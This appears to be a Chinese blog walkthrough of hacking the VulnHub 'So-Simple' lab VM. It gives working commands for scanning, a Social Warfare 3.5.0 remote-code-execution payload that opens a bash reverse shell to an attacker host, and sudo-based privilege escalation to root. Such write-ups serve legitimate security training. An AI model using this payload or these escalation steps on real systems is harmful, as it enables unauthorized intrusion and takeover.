今天实践的是vulnhub的So-Simple镜像,
下载地址,https://download.vulnhub.com/sosimple/So-Simple-1.7z,
先是用workstation导入,从console上看没获取到正确的地址,
于是又用virtualbox导入,这回获取到正确地址了,192.168.0.191,
继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.191,
有web服务,做一下目录暴破,dirb http://192.168.0.191,
发现wordpress,做插件扫描,
wpscan --url "http://192.168.0.191/wordpress" --enumerate p,
发现social-warfare插件,并且版本是3.5.0,
搜索发现有无需登录就能利用的RCE漏洞,
构造一个反弹shell的payload.txt,
<pre>system('bash -c "bash -i >& /dev/tcp/192.168.0.192/4444 0>&1"')</pre>,
kali攻击机上开个反弹shell监听,nc -lvp 4444,
再开个http下载服务,python2 -m SimpleHTTPServer,
浏览器访问,http://192.168.0.191/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.0.192:8000/payload.txt,
kali攻击机这边就看到反弹shell过来了,不是root,需要提权,
在用户max的目录下发现了用于ssh登录的密钥文件,
把id_rsa拷贝到kali攻击机上,给权限,chmod 600 id_rsa,
登录,ssh -i id_rsa [email protected],
sudo -l发现用steven用户执行的程序,
切到steven用户,sudo -u steven /usr/sbin/service ../../bin/bash,
继续sudo -l发现用root账户执行的程序,/opt/tools/server-health.sh,
创建目录,mkdir /opt/tools,
创建文件,vim /opt/tools/server-health.sh,
#!/bin/bash
bash
给权限,chmod +x /opt/tools/server-health.sh,
切到root用户,sudo -u root /opt/tools/server-health.sh,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之So-Simple的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论